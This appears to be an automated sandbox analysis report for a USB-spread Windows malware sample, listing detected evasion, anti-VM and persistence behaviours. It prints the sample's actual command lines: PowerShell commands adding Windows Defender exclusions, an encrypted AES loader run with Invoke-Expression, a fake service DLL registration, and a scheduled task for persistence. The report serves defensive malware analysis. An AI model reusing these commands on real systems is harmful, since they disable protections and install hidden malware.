Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550631D sldt word ptr [eax] 34_2_00007FF9C550631D
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3509
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1900
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6961
Found dropped PE file which has not been started or loaded
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Windows \System32\x249569.dat Jump to dropped file
Source: C:\Program Files\7-Zip\7zFM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\svchost.exe API coverage: 0.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\OpenWith.exe TID: 6948 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6312 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep count: 1432 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep count: 8470 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212 Thread sleep count: 1474 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228 Thread sleep count: 8347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 3408 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 1544 Thread sleep count: 85 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 Thread sleep count: 3509 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 Thread sleep count: 6206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep count: 1900 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep count: 7912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 2828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 6961 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352 Thread sleep time: -922337203685477s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h 46_2_64946F50
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 46_2_00007FFA4185014C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError, 46_2_00007FFA41850008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2321378970.00000150FB22F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.2309415733.000001F54E80B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 0000000B.00000002.2322397815.000001F54E902000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2347960506.00000224C243C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000B.00000002.2319192112.000001F54E867000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\svchost.exe Code function: 46_2_649461C0 IsDebuggerPresent,RaiseException, 46_2_649461C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, 51_2_00007FFA3312B470
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_64947650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 46_2_6828C940
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA2CEAEE70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA2CEAFA50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF16630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA2CF16630
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF16F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA2CF16F94
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF17178 SetUnhandledExceptionFilter, 46_2_00007FFA2CF17178
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41852770 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA41852770
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41866A2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA41866A2C
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33146224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_00007FFA33146224
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331457A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 51_2_00007FFA331457A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_00007FFA5112E24C
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 51_2_00007FFA5112D768

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell decode and execute
Source: Yara match File source: amsi64_3740.amsi.csv, type: OTHER
Adds a directory exclusion to Windows Defender
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA, 46_2_68295290
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA, 46_2_682A1460
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp, 46_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort, 46_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA, 46_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn, 46_2_00007FFA2CF14B70
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA418731AC
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 46_2_00007FFA41873674
Source: C:\Windows\System32\svchost.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 46_2_00007FFA418814CC
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA41881830
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,FormatMessageA, 46_2_00007FFA41850830
